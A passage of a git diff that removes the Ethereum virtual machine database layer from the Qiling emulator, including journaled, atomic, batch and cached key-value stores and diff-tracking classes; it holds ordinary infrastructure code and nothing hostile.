self._account_cache[address] - del self._journaltrie[address] - - def account_exists(self, address: Address) -> bool: - validate_canonical_address(address, title="Storage Address") - account_rlp = self._get_encoded_account(address, from_journal=True) - return account_rlp != b'' - - def touch_account(self, address: Address) -> None: - validate_canonical_address(address, title="Storage Address") - - account = self._get_account(address) - self._set_account(address, account) - - def account_is_empty(self, address: Address) -> bool: - return not self.account_has_code_or_nonce(address) and self.get_balance(address) == 0 - - # - # Internal - # - def _get_encoded_account(self, address: Address, from_journal: bool = True) -> bytes: - self._accessed_accounts.add(address) - lookup_trie = self._journaltrie if from_journal else self._trie_cache - - try: - return lookup_trie[address] - except trie_exceptions.MissingTrieNode as exc: - raise MissingAccountTrieNode(*exc.args) from exc - except KeyError: - # In case the account is deleted in the JournalDB - return b'' - - def _get_account(self, address: Address, from_journal: bool = True) -> Account: - if from_journal and address in self._account_cache.keys(): - return self._account_cache[address] - - rlp_account = self._get_encoded_account(address, from_journal) - - if rlp_account: - account = rlp.decode(rlp_account, sedes=Account) - else: - account = Account() - if from_journal: - self._account_cache[address] = account - return account - - def _set_account(self, address: Address, account: Account) -> None: - self._account_cache[address] = account - rlp_account = rlp.encode(account, sedes=Account) - self._journaltrie[address] = rlp_account - - # - # Record and discard API - # - def record(self) -> JournalDBCheckpoint: - checkpoint = self._journaldb.record() - self._journaltrie.record(checkpoint) - - for _, store in self._dirty_account_stores(): - store.record(checkpoint) - return checkpoint - - def discard(self, checkpoint: JournalDBCheckpoint) -> None: - self._journaldb.discard(checkpoint) - self._journaltrie.discard(checkpoint) - self._account_cache.clear() - for _, store in self._dirty_account_stores(): - store.discard(checkpoint) - - def commit(self, checkpoint: JournalDBCheckpoint) -> None: - self._journaldb.commit(checkpoint) - self._journaltrie.commit(checkpoint) - for _, store in self._dirty_account_stores(): - store.commit(checkpoint) - - def lock_changes(self) -> None: - for _, store in self._dirty_account_stores(): - store.lock_changes() - - def make_state_root(self) -> Hash32: - for _, store in self._dirty_account_stores(): - store.make_storage_root() - - for address, storage_root in self._get_changed_roots(): - if self.account_exists(address) or storage_root != BLANK_ROOT_HASH: - self._set_storage_root(address, storage_root) - - self._journaldb.persist() - - diff = self._journaltrie.diff() - if diff.deleted_keys() or diff.pending_items(): - # In addition to squashing (which is redundant here), this context manager causes - # an atomic commit of the changes, so exceptions will revert the trie - with self._trie.squash_changes() as memory_trie: - self._apply_account_diff_without_proof(diff, memory_trie) - - self._journaltrie.reset() - self._trie_cache.reset_cache() - - return self.state_root - - def persist(self) -> MetaWitnessAPI: - self.make_state_root() - - # persist storage - with self._raw_store_db.atomic_batch() as write_batch: - for address, store in self._dirty_account_stores(): - self._validate_flushed_storage(address, store) - store.persist(write_batch) - - for address, new_root in self._get_changed_roots(): - if new_root is None: - raise ValidationError( - f"Cannot validate new root of account 0x{address.hex()} " - f"which has a new root hash of None" - ) - elif new_root not in self._raw_store_db and new_root != BLANK_ROOT_HASH: - raise ValidationError( - "After persisting storage trie, a root node was not found. " - f"State root for account 0x{address.hex()} " - f"is missing for hash 0x{new_root.hex()}." - ) - - # generate witness (copy) before clearing the underlying data - meta_witness = self._get_meta_witness() - - # reset local storage trackers - self._account_stores = {} - self._dirty_accounts = set() - self._accessed_accounts = set() - self._accessed_bytecodes = set() - # We have to clear the account cache here so that future account accesses - # will get added to _accessed_accounts correctly. Account accesses that - # are cached do not add the address to the list of accessed accounts. - self._account_cache.clear() - - # persist accounts - self._validate_generated_root() - new_root_hash = self.state_root - with self._raw_store_db.atomic_batch() as write_batch: - self._batchtrie.commit_to(write_batch, apply_deletes=False) - self._batchdb.commit_to(write_batch, apply_deletes=False) - self._root_hash_at_last_persist = new_root_hash - - return meta_witness - - def _get_accessed_node_hashes(self) -> Set[Hash32]: - return cast(Set[Hash32], self._raw_store_db.keys_read) - - @to_dict - def _get_access_list(self) -> Iterable[Tuple[Address, AccountQueryTracker]]: - """ - Get the list of addresses that were accessed, whether the bytecode was accessed, and - which storage slots were accessed. - """ - for address in self._accessed_accounts: - did_access_bytecode = address in self._accessed_bytecodes - if address in self._account_stores: - accessed_storage_slots = self._account_stores[address].get_accessed_slots() - else: - accessed_storage_slots = frozenset() - yield address, AccountQueryTracker(did_access_bytecode, accessed_storage_slots) - - def _get_meta_witness(self) -> MetaWitness: - """ - Get a variety of metadata about the state witness needed to execute the block. - - This creates a copy, so that underlying changes do not affect the returned MetaWitness. - """ - return MetaWitness(self._get_accessed_node_hashes(), self._get_access_list()) - - def _validate_generated_root(self) -> None: - db_diff = self._journaldb.diff() - if len(db_diff): - raise ValidationError( - f"AccountDB had a dirty db when it needed to be clean: {db_diff!r}" - ) - trie_diff = self._journaltrie.diff() - if len(trie_diff): - raise ValidationError( - f"AccountDB had a dirty trie when it needed to be clean: {trie_diff!r}" - ) - - def _apply_account_diff_without_proof(self, diff: DBDiff, trie: DatabaseAPI) -> None: - """ - Apply diff of trie updates, when original nodes might be missing. - Note that doing this naively will raise exceptions about missing nodes - from *intermediate* trie roots. This captures exceptions and uses the previous - trie root hash that will be recognized by other nodes. - """ - # It's fairly common that when an account is deleted, we need to retrieve nodes - # for accounts that were not needed during normal execution. We only need these - # nodes to refactor the trie. - for delete_key in diff.deleted_keys(): - try: - del trie[delete_key] - except trie_exceptions.MissingTrieNode as exc: - raise MissingAccountTrieNode( - exc.missing_node_hash, - self._root_hash_at_last_persist, - exc.requested_key, - ) from exc - - # It's fairly unusual, but possible, that setting an account will need unknown - # nodes during a trie refactor. Here is an example that seems to cause it: - # - # Setup: - # - Root node is a branch, with 0 pointing to a leaf - # - The complete leaf key is (0, 1, 2), so (1, 2) is in the leaf node - # - We know the leaf node hash but not the leaf node body - # Refactor that triggers missing node: - # - Add value with key (0, 3, 4) - # - We need to replace the current leaf node with a branch that points leaves at 1 and 3 - # - The leaf for key (0, 1, 2) now contains only the (2) part, so needs to be rebuilt - # - We need the full body of the old (1, 2) leaf node, to rebuild - - for key, val in diff.pending_items(): - try: - trie[key] = val - except trie_exceptions.MissingTrieNode as exc: - raise MissingAccountTrieNode( - exc.missing_node_hash, - self._root_hash_at_last_persist, - exc.requested_key, - ) from exc diff --git a/qiling/arch/evm/db/atomic.py b/qiling/arch/evm/db/atomic.py deleted file mode 100644 index 22e2da2ee..000000000 --- a/qiling/arch/evm/db/atomic.py +++ /dev/null @@ -1,137 +0,0 @@ -from contextlib import contextmanager -import logging -from typing import ( - Iterator, -) - -from eth_utils import ( - ValidationError, -) - -from ..abc import ( - AtomicWriteBatchAPI, - DatabaseAPI, -) - -from ..db.diff import ( - DBDiff, - DBDiffTracker, - DiffMissingError, -) -from ..db.backends.base import BaseAtomicDB, BaseDB -from ..db.backends.memory import MemoryDB - - -class AtomicDB(BaseAtomicDB): - logger = logging.getLogger("eth.db.AtomicDB") - - wrapped_db: DatabaseAPI = None - _track_diff: DBDiffTracker = None - - def __init__(self, wrapped_db: DatabaseAPI = None) -> None: - if wrapped_db is None: - self.wrapped_db = MemoryDB() - else: - self.wrapped_db = wrapped_db - - def __getitem__(self, key: bytes) -> bytes: - return self.wrapped_db[key] - - def __setitem__(self, key: bytes, value: bytes) -> None: - self.wrapped_db[key] = value - - def __delitem__(self, key: bytes) -> None: - del self.wrapped_db[key] - - def _exists(self, key: bytes) -> bool: - return key in self.wrapped_db - - @contextmanager - def atomic_batch(self) -> Iterator[AtomicWriteBatchAPI]: - with AtomicDBWriteBatch._commit_unless_raises(self) as readable_batch: - yield readable_batch - - -class AtomicDBWriteBatch(BaseDB, AtomicWriteBatchAPI): - """ - This is returned by a BaseAtomicDB during an atomic_batch, to provide a temporary view - of the database, before commit. - """ - logger = logging.getLogger("eth.db.AtomicDBWriteBatch") - - _write_target_db: DatabaseAPI = None - _track_diff: DBDiffTracker = None - - def __init__(self, write_target_db: DatabaseAPI) -> None: - self._write_target_db = write_target_db - self._track_diff = DBDiffTracker() - - def __getitem__(self, key: bytes) -> bytes: - if self._track_diff is None: - raise ValidationError("Cannot get data from a write batch, out of context") - - try: - value = self._track_diff[key] - except DiffMissingError as missing: - if missing.is_deleted: - raise KeyError(key) - else: - return self._write_target_db[key] - else: - return value - - def __setitem__(self, key: bytes, value: bytes) -> None: - if self._track_diff is None: - raise ValidationError("Cannot set data from a write batch, out of context") - - self._track_diff[key] = value - - def __delitem__(self, key: bytes) -> None: - if self._track_diff is None: - raise ValidationError("Cannot delete data from a write batch, out of context") - - if key not in self: - raise KeyError(key) - del self._track_diff[key] - - def _diff(self) -> DBDiff: - return self._track_diff.diff() - - def _commit(self) -> None: - self._diff().apply_to(self._write_target_db, apply_deletes=True) - - def _exists(self, key: bytes) -> bool: - if self._track_diff is None: - raise ValidationError("Cannot test data existance from a write batch, out of context") - - try: - self[key] - except KeyError: - return False - else: - return True - - @classmethod - @contextmanager - def _commit_unless_raises(cls, write_target_db: DatabaseAPI) -> Iterator[AtomicWriteBatchAPI]: - """ - Commit all writes inside the context, unless an exception was raised. - - Although this is technically an external API, it (and this whole class) is only intended - to be used by AtomicDB. - """ - readable_write_batch: AtomicDBWriteBatch = cls(write_target_db) - try: - yield readable_write_batch - except Exception: - cls.logger.exception( - "Unexpected error in atomic db write, dropped partial writes: %r", - readable_write_batch._diff(), - ) - raise - else: - readable_write_batch._commit() - finally: - # force a shutdown of this batch, to prevent out-of-context usage - readable_write_batch._track_diff = None - readable_write_batch._write_target_db = None diff --git a/qiling/arch/evm/db/backends/__init__.py b/qiling/arch/evm/db/backends/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/qiling/arch/evm/db/backends/base.py b/qiling/arch/evm/db/backends/base.py deleted file mode 100644 index e2047394e..000000000 --- a/qiling/arch/evm/db/backends/base.py +++ /dev/null @@ -1,77 +0,0 @@ -from typing import ( - Iterator, -) - -from ...abc import ( - AtomicDatabaseAPI, - DatabaseAPI, -) - - -class BaseDB(DatabaseAPI): - """ - This is an abstract key/value lookup with all :class:`bytes` values, - with some convenience methods for databases. As much as possible, - you can use a DB as if it were a :class:`dict`. - - Notable exceptions are that you cannot iterate through all values or get the length. - (Unless a subclass explicitly enables it). - - All subclasses must implement these methods: - __init__, __getitem__, __setitem__, __delitem__ - - Subclasses may optionally implement an _exists method - that is type-checked for key and value. - """ - def set(self, key: bytes, value: bytes) -> None: - self[key] = value - - def exists(self, key: bytes) -> bool: - return self.__contains__(key) - - def __contains__(self, key: bytes) -> bool: # type: ignore # Breaks LSP - if hasattr(self, '_exists'): - # Classes which inherit this class would have `_exists` attr - return self._exists(key) # type: ignore - else: - return super().__contains__(key) - - def delete(self, key: bytes) -> None: - try: - del self[key] - except KeyError: - pass - - def __iter__(self) -> Iterator[bytes]: - raise NotImplementedError("By default, DB classes cannot be iterated.") - - def __len__(self) -> int: - raise NotImplementedError("By default, DB classes cannot return the total number of keys.") - - -class BaseAtomicDB(BaseDB, AtomicDatabaseAPI): - """ - This is an abstract key/value lookup that permits batching of updates, such that the batch of - changes are atomically saved. They are either all saved, or none are. - - Writes to the database are immediately saved, unless they are explicitly batched - in a context, like this: - - :: - - atomic_db = AtomicDB() - with atomic_db.atomic_batch() as db: - # changes are not immediately saved to the db, inside this context - db[key] = val - - # changes are still locally visible even though they are not yet committed to the db - assert db[key] == val - - if some_bad_condition: - raise Exception("something went wrong, erase all the pending changes") - - db[key2] = val2 - # when exiting the context, the values are saved either key and key2 will both be saved, - # or neither will - """ - pass diff --git a/qiling/arch/evm/db/backends/memory.py b/qiling/arch/evm/db/backends/memory.py deleted file mode 100644 index 9d59a637f..000000000 --- a/qiling/arch/evm/db/backends/memory.py +++ /dev/null @@ -1,39 +0,0 @@ -from typing import ( - Dict, - Iterator, -) - -from .base import ( - BaseDB, -) - - -class MemoryDB(BaseDB): - kv_store: Dict[bytes, bytes] = None - - def __init__(self, kv_store: Dict[bytes, bytes] = None) -> None: - if kv_store is None: - self.kv_store = {} - else: - self.kv_store = kv_store - - def __getitem__(self, key: bytes) -> bytes: - return self.kv_store[key] - - def __setitem__(self, key: bytes, value: bytes) -> None: - self.kv_store[key] = value - - def _exists(self, key: bytes) -> bool: - return key in self.kv_store - - def __delitem__(self, key: bytes) -> None: - del self.kv_store[key] - - def __iter__(self) -> Iterator[bytes]: - return iter(self.kv_store) - - def __len__(self) -> int: - return len(self.kv_store) - - def __repr__(self) -> str: - return f"MemoryDB({self.kv_store!r})" diff --git a/qiling/arch/evm/db/batch.py b/qiling/arch/evm/db/batch.py deleted file mode 100644 index a020ef7f8..000000000 --- a/qiling/arch/evm/db/batch.py +++ /dev/null @@ -1,87 +0,0 @@ -import logging - -from eth_utils import ( - ValidationError, -) - -from ..abc import DatabaseAPI -from ..db.diff import ( - DBDiff, - DBDiffTracker, - DiffMissingError, -) -from ..db.backends.base import BaseDB - - -class BatchDB(BaseDB): - """ - A wrapper of basic DB objects with uncommitted DB changes stored in local cache, - which represents as a dictionary of database keys and values. - This class should be usable as a context manager, the changes either all fail or all succeed. - Upon exiting the context, it writes all of the key value pairs from the cache into - the underlying database. If any error occurred before committing phase, - we would not apply commits at all. - """ - logger = logging.getLogger("eth.db.BatchDB") - - wrapped_db: DatabaseAPI = None - _track_diff: DBDiffTracker = None - - def __init__(self, wrapped_db: DatabaseAPI, read_through_deletes: bool = False) -> None: - self.wrapped_db = wrapped_db - self._track_diff = DBDiffTracker() - self._read_through_deletes = read_through_deletes - - def __enter__(self) -> 'BatchDB': - return self - - def __exit__(self, exc_type: None, exc_value: None, traceback: None) -> None: - # commit all the changes from local cache to underlying db - if exc_type is None: - self.commit() - else: - self.clear() - self.logger.exception("Unexpected error occurred during batch update") - - def clear(self) -> None: - self._track_diff = DBDiffTracker() - - def commit(self, apply_deletes: bool = True) -> None: - self.commit_to(self.wrapped_db, apply_deletes) - - def commit_to(self, target_db: DatabaseAPI, apply_deletes: bool = True) -> None: - if apply_deletes and self._read_through_deletes: - raise ValidationError("BatchDB should never apply deletes when reading through deletes") - diff = self.diff() - diff.apply_to(target_db, apply_deletes) - self.clear() - - def _exists(self, key: bytes) -> bool: - try: - self[key] - except KeyError: - return False - else: - return True - - def __getitem__(self, key: bytes) -> bytes: - try: - value = self._track_diff[key] - except DiffMissingError as missing: - if missing.is_deleted and not self._read_through_deletes: - raise KeyError(key) - else: - return self.wrapped_db[key] - else: - return value - - def __setitem__(self, key: bytes, value: bytes) -> None: - self._track_diff[key] = value - - def __delitem__(self, key: bytes) -> None: - if key not in self: - raise KeyError(key) - del self._track_diff[key] - - def diff(self) -> DBDiff: - return self._track_diff.diff() diff --git a/qiling/arch/evm/db/cache.py b/qiling/arch/evm/db/cache.py deleted file mode 100644 index 6678508d9..000000000 --- a/qiling/arch/evm/db/cache.py +++ /dev/null @@ -1,32 +0,0 @@ -from lru import LRU - -from ..abc import DatabaseAPI -from ..db.backends.base import BaseDB - - -class CacheDB(BaseDB): - """ - Set and get decoded RLP objects, where the underlying db stores - encoded objects. - """ - def __init__(self, db: DatabaseAPI, cache_size: int = 2048) -> None: - self._db = db - self._cache_size = cache_size - self.reset_cache() - - def reset_cache(self) -> None: - self._cached_values = LRU(self._cache_size) - - def __getitem__(self, key: bytes) -> bytes: - if key not in self._cached_values: - self._cached_values[key] = self._db[key] - return self._cached_values[key] - - def __setitem__(self, key: bytes, value: bytes) -> None: - self._cached_values[key] = value - self._db[key] = value - - def __delitem__(self, key: bytes) -> None: - if key in self._cached_values: - del self._cached_values[key] - del self._db[key] diff --git a/qiling/arch/evm/db/diff.py b/qiling/arch/evm/db/diff.py deleted file mode 100644 index 53f8edab7..000000000 --- a/qiling/arch/evm/db/diff.py +++ /dev/null @@ -1,219 +0,0 @@ -from collections.abc import ( - Mapping, - MutableMapping, -) -from typing import ( - cast, - Dict, - Iterable, - Union, - Tuple, - TYPE_CHECKING, -) - -from eth_utils import ( - encode_hex, - to_tuple, -) - -from ..abc import DatabaseAPI -from ..vm.interrupt import EVMMissingData - -if TYPE_CHECKING: - ABC_Mutable_Mapping = MutableMapping[bytes, Union[bytes, 'MissingReason']] - ABC_Mapping = Mapping[bytes, Union[bytes, 'MissingReason']] -else: - ABC_Mutable_Mapping = MutableMapping - ABC_Mapping = Mapping - - -class MissingReason(str): - pass - - -NEVER_INSERTED = MissingReason("Key is missing because it was never inserted") -DELETED = MissingReason("Key is missing because it was deleted") - - -class DiffMissingError(KeyError): - """ - Raised when trying to access a missing key/value pair in a :class:`DBDiff` - or :class:`DBDiffTracker`. - - Use :attr:`is_deleted` to check if the value is missing because it was - deleted, or simply because it was never updated. - """ - def __init__(self, missing_key: bytes, reason: MissingReason) -> None: - self.reason = reason - super().__init__(missing_key, reason) - - @property - def is_deleted(self) -> bool: - return self.reason == DELETED - - -class DBDiffTracker(ABC_Mutable_Mapping): - """ - Records changes to a :class:`~eth.abc.DatabaseAPI` - - If no value is available for a key, it could be for one of two reasons: - - the key was never updated during tracking - - the key was deleted at some point - - When getting a value, a special subtype of KeyError is raised on failure. - The exception, :class:`DiffMissingError`, can be used to check if the value - was deleted, or never present, using :meth:`DiffMissingError.is_deleted`. - - When it's time to take the tracked changes and write them to your database, - get the :class:`DBDiff` with :meth:`DBDiffTracker.diff` and use the attached methods. - """ - def __init__(self) -> None: - self._changes: Dict[bytes, Union[bytes, MissingReason]] = {} - - def __contains__(self, key: bytes) -> bool: # type: ignore # Breaks LSP - result = self._changes.get(key, NEVER_INSERTED) - return result not in (DELETED, NEVER_INSERTED) - - def __getitem__(self, key: bytes) -> bytes: - result = self._changes.get(key, NEVER_INSERTED) - if result in (DELETED, NEVER_INSERTED): - raise DiffMissingError(key, result) # type: ignore # ignore over cast for perf reasons - else: - return result # type: ignore # ignore over cast for perf reasons - - def __setitem__(self, key: bytes, value: Union[bytes, MissingReason]) -> None: - self._changes[key] = value - - def __delitem__(self, key: bytes) -> None: - # The diff does not have access to any underlying db, - # so it cannot check if the key exists before deleting. - self._changes[key] = DELETED - - def __iter__(self) -> None: - raise NotImplementedError( - "Cannot iterate through changes, use diff().apply_to(db) to update a database" - ) - - def __len__(self) -> int: - return len(self._changes) - - def diff(self) -> 'DBDiff': - return DBDiff(dict(self._changes)) - - -class DBDiff(ABC_Mapping): - """ - DBDiff is a read-only view of the updates/inserts and deletes - generated when tracking changes with :class:`DBDiffTracker`. - - The primary usage is to apply these changes to your underlying - database with :meth:`apply_to`. - """ - _changes: Dict[bytes, Union[bytes, MissingReason]] = None - - def __init__(self, changes: Dict[bytes, Union[bytes, MissingReason]] = None) -> None: - if changes is None: - self._changes = {} - else: - self._changes = changes - - def __getitem__(self, key: bytes) -> bytes: - result = self._changes.get(key, NEVER_INSERTED) - if result in (DELETED, NEVER_INSERTED): - raise DiffMissingError(key, result) # type: ignore # ignore over cast for perf reasons - else: - return result # type: ignore # ignore over cast for perf reasons - - def __iter__(self) -> None: - raise NotImplementedError( - "Cannot iterate through changes, use apply_to(db) to update a database. " - "Also, pending_keys(), deleted_keys(), and pending_items() might be of interest." - ) - - def __eq__(self, other: object) -> bool: - if not isinstance(other, DBDiff): - return False - else: - return self._changes == other._changes - - def __repr__(self) -> str: - deleted = [ - f'key={encode_hex(key)}' - for key, val in self._changes.items() - if val is DELETED - ] - updated = [ - f"key={encode_hex(key)} to val={encode_hex(cast(bytes, val))}" - for key, val in self._changes.items() - if val is not DELETED - ] - return f"" - - def __len__(self) -> int: - return len(self._changes) - - @to_tuple - def deleted_keys(self) -> Iterable[bytes]: - """ - List all the keys that have been deleted. - """ - for key, value in self._changes.items(): - if value is DELETED: - yield key - - @to_tuple - def pending_keys(self) -> Iterable[bytes]: - """ - List all the keys who have had values change. This IGNORES - any keys that have been deleted. - """ - for key, value in self._changes.items(): - if value is not DELETED: - yield key - - @to_tuple - def pending_items(self) -> Iterable[Tuple[bytes, bytes]]: - """ - A tuple of (key, value) pairs for every key that has been updated. - Like :meth:`pending_keys()`, this does not return any deleted keys. - """ - for key, value in self._changes.items(): - if value is not DELETED: - yield key, value # type: ignore # value can only be DELETED or actual new value - - def apply_to(self, - db: Union[DatabaseAPI, ABC_Mutable_Mapping], - apply_deletes: bool = True) -> None: - """ - Apply the changes in this diff to the given database. - You may choose to opt out of deleting any underlying keys. - - :param apply_deletes: whether the pending deletes should be - applied to the database - """ - for key, value in self._changes.items(): - if value is DELETED: - if apply_deletes: - try: - del db[key] - except EVMMissingData: - raise - except KeyError: - pass - else: - pass - else: - db[key] = value # type: ignore # ignore over cast for perf reasons - - @classmethod - def join(cls, diffs: Iterable['DBDiff']) -> 'DBDiff': - """ - Join several DBDiff objects into a single DBDiff object. - - In case of a conflict, changes in diffs that come later - in ``diffs`` will overwrite changes from earlier changes. - """ - tracker = DBDiffTracker() - for diff in diffs: - diff.apply_to(tracker) - return tracker.diff() diff --git a/qiling/arch/evm/db/hash_trie.py b/qiling/arch/evm/db/hash_trie.py deleted file mode 100644 index cd89c00d8..000000000 --- a/qiling/arch/evm/db/hash_trie.py +++ /dev/null @@ -1,21 +0,0 @@ -import contextlib -from typing import ( - cast, - Iterator, -) - -from eth_hash.auto import keccak -from trie import HexaryTrie - -from ..db.keymap import ( - KeyMapDB, -) - - -class HashTrie(KeyMapDB): - keymap = keccak - - @contextlib.contextmanager - def squash_changes(self) -> Iterator['HashTrie']: - with cast(HexaryTrie, self._db).squash_changes() as memory_trie: - yield type(self)(memory_trie) diff --git a/qiling/arch/evm/db/journal.py b/qiling/arch/evm/db/journal.py deleted file mode 100644 index 288fddf79..000000000 --- a/qiling/arch/evm/db/journal.py +++ /dev/null @@ -1,444 +0,0 @@ -import collections -from itertools import ( - count, -) -from typing import Callable, cast, Dict, List, Set, Union - -from eth_utils.toolz import ( - first, - nth, -) -from eth_utils import ( - ValidationError, -) - -from ..abc import DatabaseAPI -from ..typing import JournalDBCheckpoint - -from .backends.base import BaseDB -from .diff import DBDiff, DBDiffTracker - - -class DeletedEntry: - pass - - -# Track two different kinds of deletion: - -# 1. key in wrapped -# 2. key modified in journal -# 3. key deleted -DELETE_WRAPPED = DeletedEntry() - -# 1. key not in wrapped -# 2. key created in journal -# 3. key deleted -REVERT_TO_WRAPPED = DeletedEntry() - -ChangesetValue = Union[bytes, DeletedEntry] -ChangesetDict = Dict[bytes, ChangesetValue] - -get_next_checkpoint = cast(Callable[[], JournalDBCheckpoint], count().__next__) - - -class Journal(BaseDB): - """ - A Journal provides a mechanism to track a series of changes to a dict, by inserting - checkpoints, and committing to them or rolling back to them, and ultimitely persisting - the final changes. - - Internally, it keeps an ordered list of reversion changesets, used to roll back - on demand. This is optimized for the most common path: lots of checkpoints and commits, - and not many discards. - - Checkpoints are referenced by an internally-generated integer. This is *not* threadsafe. - """ - __slots__ = [ - '_journal_data', - '_clears_at', - '_current_values', - '_ignore_wrapped_db', - '_checkpoint_stack', - ] - - # - # This is a high-use class, where we sometimes prefere optimization over readability. - # It's most important to optimize for record, commit, and persist, which ard the most commonly - # used methods. - # - - def __init__(self) -> None: - # If the journal was persisted right now, these would be the current changes to push: - self._current_values: ChangesetDict = {} - - # contains a mapping from all of the int checkpoints - # to a dictionary of key:value pairs that are used to rewind from the current values - # to the given checkpoint - self._journal_data: collections.OrderedDict[JournalDBCheckpoint, ChangesetDict] = collections.OrderedDict() # noqa E501 - - # Clears are special operations that enforce that the underlying database and current - # changes are completely emptied out. Clears are also committable & discardable. - self._clears_at: Set[JournalDBCheckpoint] = set() - - # If a clear was called, then any missing keys should be treated as missing - self._ignore_wrapped_db = False - - # To speed up commits, we leave in old recorded checkpoints in self._journal_data, even - # on commit. Instead of dropping them, we keep a separate list of active checkpoints. - self._checkpoint_stack: List[JournalDBCheckpoint] = [] - - @property - def root_checkpoint(self) -> JournalDBCheckpoint: - """ - Returns the starting checkpoint - """ - return first(self._journal_data.keys()) - - @property - def is_flattened(self) -> bool: - """ - :return: whether there are any explicitly committed checkpoints - """ - return len(self._checkpoint_stack) < 2 - - @property - def last_checkpoint(self) -> JournalDBCheckpoint: - """ - Returns the latest checkpoint - """ - # last() was iterating through all values, so first(reversed()) gives a 12.5x speedup - # Interestingly, an attempt to cache this value caused a slowdown. - return first(reversed(self._journal_data.keys())) - - def has_checkpoint(self, checkpoint: JournalDBCheckpoint) -> bool: - # another option would be to enforce monotonically-increasing checkpoints, so we can do: - # checkpoint_idx = bisect_left(self._checkpoint_stack, checkpoint) - # (then validate against length and value at index) - return checkpoint in self._checkpoint_stack - - def record_checkpoint( - self, - custom_checkpoint: JournalDBCheckpoint = None) -> JournalDBCheckpoint: - """ - Creates a new checkpoint. Checkpoints are a sequential int chosen by Journal - to prevent collisions. - """ - if custom_checkpoint is not None: - if custom_checkpoint in self._journal_data: - raise ValidationError( - f"Tried to record with an existing checkpoint: {custom_checkpoint!r}" - ) - else: - checkpoint = custom_checkpoint - else: - checkpoint = get_next_checkpoint() - - self._journal_data[checkpoint] = {} - self._checkpoint_stack.append(checkpoint) - return checkpoint - - def discard(self, through_checkpoint_id: JournalDBCheckpoint) -> None: - while self._checkpoint_stack: - checkpoint_id = self._checkpoint_stack.pop() - if checkpoint_id == through_checkpoint_id: - break - else: - # checkpoint not found! - raise ValidationError(f"No checkpoint {through_checkpoint_id} was found") - - # This might be optimized further by iterating the other direction and - # ignoring any follow-up rollbacks on the same variable. - for _ in range(len(self._journal_data)): - checkpoint_id, rollback_data = self._journal_data.popitem() - - for old_key, old_value in rollback_data.items(): - if old_value is REVERT_TO_WRAPPED: - # The current value may not exist, if it was a delete followed by a clear, - # so pop it off, or ignore if it is already missing - self._current_values.pop(old_key, None) - elif old_value is DELETE_WRAPPED: - self._current_values[old_key] = old_value - elif type(old_value) is bytes: - self._current_values[old_key] = old_value - else: - raise ValidationError(f"Unexpected value, must be bytes: {old_value!r}") - - if checkpoint_id in self._clears_at: - self._clears_at.remove(checkpoint_id) - self._ignore_wrapped_db = False - - if checkpoint_id == through_checkpoint_id: - break - - if self._clears_at: - # if there is still a clear in older locations, then reinitiate the clear flag - self._ignore_wrapped_db = True - - def clear(self) -> None: - """ - Treat as if the *underlying* database will also be cleared by some other mechanism. - We build a special empty reversion changeset just for marking that all previous data should - be ignored. - """ - checkpoint = get_next_checkpoint() - self._journal_data[checkpoint] = self._current_values - self._current_values = {} - self._ignore_wrapped_db = True - self._clears_at.add(checkpoint) - - def has_clear(self, at_checkpoint: JournalDBCheckpoint) -> bool: - for reversion_changeset_id in reversed(self._journal_data.keys()): - if reversion_changeset_id in self._clears_at: - return True - elif at_checkpoint == reversion_changeset_id: - return False - raise ValidationError(f"Checkpoint {at_checkpoint} is not in the journal") - - def commit_checkpoint(self, commit_to: JournalDBCheckpoint) -> ChangesetDict: - """ - Collapses all changes since the given checkpoint. Can no longer discard to any of - the checkpoints that followed the given checkpoint. - """ - # Another option would be to enforce monotonically-increasing changeset ids, so we can do: - # checkpoint_idx = bisect_left(self._checkpoint_stack, commit_to) - # (then validate against length and value at index) - for positions_before_last, checkpoint in enumerate(reversed(self._checkpoint_stack)): - if checkpoint == commit_to: - checkpoint_idx = -1 - positions_before_last - break - else: - raise ValidationError(f"No checkpoint {commit_to} was found") - - if checkpoint_idx == -1 * len(self._checkpoint_stack): - raise ValidationError( - "Should not commit root changeset with commit_changeset, use pop_all() instead" - ) - - # delete committed checkpoints from the stack (but keep rollbacks for future discards) - del self._checkpoint_stack[checkpoint_idx:] - - return self._current_values - - def pop_all(self) -> ChangesetDict: - final_changes = self._current_values - self._journal_data.clear() - self._clears_at.clear() - self._current_values = {} - self._checkpoint_stack.clear() - self.record_checkpoint() - self._ignore_wrapped_db = False - return final_changes - - def flatten(self) -> None: - if self.is_flattened: - return - - checkpoint_after_root = nth(1, self._checkpoint_stack) - self.commit_checkpoint(checkpoint_after_root) - - # - # Database API - # - def __getitem__(self, key: bytes) -> ChangesetValue: # type: ignore # Breaks LSP - """ - For key lookups we need to iterate through the changesets in reverse - order, returning from the first one in which the key is present. - """ - # the default result (the value if not in the local values) depends on whether there - # was a clear - if self._ignore_wrapped_db: - default_result = REVERT_TO_WRAPPED - else: - default_result = None # indicate that caller should check wrapped database - return self._current_values.get(key, default_result) - - def __setitem__(self, key: bytes, value: bytes) -> None: - # if the value has not been changed since wrapping, then simply revert to original value - revert_changeset = self._journal_data[self.last_checkpoint] - if key not in revert_changeset: - revert_changeset[key] = self._current_values.get(key, REVERT_TO_WRAPPED) - self._current_values[key] = value - - def _exists(self, key: bytes) -> bool: - val = self.get(key) - return val is not None and val not in (REVERT_TO_WRAPPED, DELETE_WRAPPED) - - def __delitem__(self, key: bytes) -> None: - raise NotImplementedError("You must delete with one of delete_local or delete_wrapped") - - def delete_wrapped(self, key: bytes) -> None: - revert_changeset = self._journal_data[self.last_checkpoint] - if key not in revert_changeset: - revert_changeset[key] = self._current_values.get(key, REVERT_TO_WRAPPED) - self._current_values[key] = DELETE_WRAPPED - - def delete_local(self, key: bytes) -> None: - revert_changeset = self._journal_data[self.last_checkpoint] - if key not in revert_changeset: - revert_changeset[key] = self._current_values.get(key, REVERT_TO_WRAPPED) - self._current_values[key] = REVERT_TO_WRAPPED - - def diff(self) -> DBDiff: - tracker = DBDiffTracker() - - for key, value in self._current_values.items(): - if value is DELETE_WRAPPED: - del tracker[key] - elif value is REVERT_TO_WRAPPED: - pass - else: - tracker[key] = value # type: ignore # cast(bytes, value) - - return tracker.diff() - - -class JournalDB(BaseDB): - """ - A wrapper around the basic DB objects that keeps a journal of all changes. - Checkpoints can be recorded at any time. You can then commit or roll back - to those checkpoints. - - Discarding a checkpoint throws away all changes that happened since that - checkpoint. - Commiting a checkpoint simply removes the option of reverting back to it - later. - - Nothing is written to the underlying db until `persist()` is called. - - The added memory footprint for a JournalDB is one key/value stored per - database key which is changed, at each checkpoint. Subsequent changes to the same key - between two checkpoints will not increase the journal size, since we - do not permit reverting to a place that has no 